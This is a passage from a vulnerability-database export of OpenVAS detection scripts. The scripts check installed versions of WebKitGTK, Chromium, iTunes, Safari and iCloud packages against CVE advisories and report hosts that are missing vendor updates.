CVE-2019-8559,\n CVE-2019-8563, CVE-2019-11070 (bsc#1132256).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1374=1\");\n\n script_tag(name:\"affected\", value:\"'webkit2gtk3' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser\", rpm:\"webkit2gtk3-minibrowser~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser-debuginfo\", rpm:\"webkit2gtk3-minibrowser-debuginfo~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-32bit-debuginfo~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.24.1~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-31T15:08:45", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-03-26T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates (HT209604)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-8518", "CVE-2019-8503", "CVE-2019-8523", "CVE-2019-8563", "CVE-2019-8506", "CVE-2019-8559", "CVE-2019-8558", "CVE-2019-8515", "CVE-2019-8562", "CVE-2019-8551", "CVE-2019-8544", "CVE-2019-6201", "CVE-2019-8556", "CVE-2019-8542", "CVE-2019-7285", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-7292", "CVE-2019-8524"], "modified": "2019-05-22T00:00:00", "id": "OPENVAS:1361412562310814875", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814875", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814875\");\n script_version(\"2019-05-22T13:05:41+0000\");\n script_cve_id(\"CVE-2019-8542\", \"CVE-2019-8506\", \"CVE-2019-8535\", \"CVE-2019-6201\",\n \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8558\",\n \"CVE-2019-8559\", \"CVE-2019-8563\", \"CVE-2019-8515\", \"CVE-2019-8536\",\n \"CVE-2019-8544\", \"CVE-2019-7285\", \"CVE-2019-8556\", \"CVE-2019-8503\",\n \"CVE-2019-8562\", \"CVE-2019-7292\", \"CVE-2019-8551\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:05:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 10:32:20 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Apple iTunes Security Updates (HT209604)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A buffer overflow error,\n\n - A type confusion error,\n\n - Multiple memory corruption issues,\n\n - A cross-origin issue with the fetch API,\n\n - A use after free error,\n\n - A logic issue and\n\n - A validation issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to elevate privileges, execute scripts, circumvent\n sandbox restrictions, execute arbitrary code, read sensitive user information\n and process memory, conduct universal cross site scripting by processing\n maliciously crafted web content.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.9.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.9.4 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209604\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nituneVer = infos['version'];\nitunePath = infos['location'];\n\nif(version_is_less(version:ituneVer, test_version:\"12.9.4\"))\n{\n report = report_fixed_ver(installed_version: ituneVer, fixed_version:\"12.9.4\", install_path: itunePath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3635-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4119", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4163", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4133", "CVE-2018-4162", "CVE-2018-4125", "CVE-2018-4113", "CVE-2018-4127", "CVE-2018-4117", "CVE-2018-4161", "CVE-2018-4122"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843514", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843514", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3635_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3635-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843514\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-01 05:30:51 +0200 (Tue, 01 May 2018)\");\n script_cve_id(\"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\",\n \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4122\",\n \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\",\n \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\",\n \"CVE-2018-4163\", \"CVE-2018-4165\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3635-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\ndiscovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\ninto viewing a malicious website, a remote attacker could exploit a variety of\nissues related to web browser security, including cross-site scripting attacks,\ndenial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 17.10,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3635-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3635-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.20.1-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.20.1-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.20.1-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.20.1-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.20.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.20.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.20.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.20.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:52:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2018-fd194a1f14", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17472", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17478", "CVE-2018-16435", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17479", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-02T00:00:00", "id": "OPENVAS:1361412562310875299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875299", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for chromium FEDORA-2018-fd194a1f14\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875299\");\n script_version(\"2019-07-02T10:26:41+0000\");\n script_cve_id(\"CVE-2018-17478\", \"CVE-2018-17479\", \"CVE-2018-16435\", \"CVE-2018-17462\", \"CVE-2018-17463\", \"CVE-2018-17464\", \"CVE-2018-17465\", \"CVE-2018-17466\", \"CVE-2018-17467\", \"CVE-2018-17468\", \"CVE-2018-17469\", \"CVE-2018-17470\", \"CVE-2018-17471\", \"CVE-2018-17473\", \"CVE-2018-17474\", \"CVE-2018-17475\", \"CVE-2018-17476\", \"CVE-2018-5179\", \"CVE-2018-17477\", \"CVE-2018-17472\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-02 10:26:41 +0000 (Tue, 02 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:19:58 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for chromium FEDORA-2018-fd194a1f14\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-fd194a1f14\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EGYVJ7TOEEFWMXPEHXQHYSD6LDOEY736\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2018-fd194a1f14 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"chromium on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~70.0.3538.110~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-31T15:08:57", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-03-26T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates( HT209603 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-8518", "CVE-2019-8503", "CVE-2019-8523", "CVE-2019-8563", "CVE-2019-8506", "CVE-2019-8559", "CVE-2019-8558", "CVE-2019-8515", "CVE-2019-8562", "CVE-2019-6204", "CVE-2019-8551", "CVE-2019-8544", "CVE-2019-8505", "CVE-2019-6201", "CVE-2019-8556", "CVE-2019-7285", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-7292", "CVE-2019-8524"], "modified": "2019-05-22T00:00:00", "id": "OPENVAS:1361412562310814876", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814876", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814876\");\n script_version(\"2019-05-22T13:05:41+0000\");\n script_cve_id(\"CVE-2019-6204\", \"CVE-2019-8505\", \"CVE-2019-8506\", \"CVE-2019-8535\",\n \"CVE-2019-6201\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\",\n \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\", \"CVE-2019-8536\",\n \"CVE-2019-8544\", \"CVE-2019-8515\", \"CVE-2019-7285\", \"CVE-2019-8556\",\n \"CVE-2019-8503\", \"CVE-2019-7292\", \"CVE-2019-8562\", \"CVE-2019-8551\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:05:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 10:33:50 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Apple Safari Security Updates( HT209603 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A logic issue.\n\n - A type confusion issue.\n\n - Multiple memory corruption issues.\n\n - A cross-origin issue with the fetch API.\n\n - A use after free issue.\n\n - A validation issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to execute scripts, circumvent sandbox restrictions,\n read sensitive user information and process memory, execute arbitrary code and\n conduct universal cross site scripting by processing maliciously crafted web\n content.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 12.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 12.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209603\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\nsafPath = infos['location'];\n\nif(version_is_less(version:safVer, test_version:\"12.1\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"12.1\", install_path:safPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-05T16:57:43", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-03-26T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates( HT209605 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-8518", "CVE-2019-8503", "CVE-2019-8523", "CVE-2019-8563", "CVE-2019-8506", "CVE-2019-8559", "CVE-2019-8558", "CVE-2019-8515", "CVE-2019-8551", "CVE-2019-8544", "CVE-2019-6201", "CVE-2019-8556", "CVE-2019-8542", "CVE-2019-7285", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-6232", "CVE-2019-7292", "CVE-2019-8524", "CVE-2019-6236"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310815005", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815005", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815005\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2019-8542\", \"CVE-2019-6232\", \"CVE-2019-8506\", \"CVE-2019-8535\",\n \"CVE-2019-6201\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\",\n \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\", \"CVE-2019-8515\",\n \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-7285\", \"CVE-2019-8556\",\n \"CVE-2019-8503\", \"CVE-2019-7292\", \"CVE-2019-8551\", \"CVE-2019-6236\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-03-26 14:42:55 +0530 (Tue, 26 Mar 2019)\");\n script_name(\"Apple iCloud Security Updates( HT209605 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A buffer overflow error due to improper bounds checking.\n\n - A type confusion issue due to improper memory handling.\n\n - A memory corruption issue due to improper state management.\n\n - A cross-origin issue existed with the fetch API.\n\n - A memory corruption issue related to improper memory handling.\n\n - A use after free issue while processing maliciously crafted web content.\n\n - Logic and validation issues while processing maliciously crafted web content.\n\n - A race condition existed during the installation of iCloud.\");\n\n 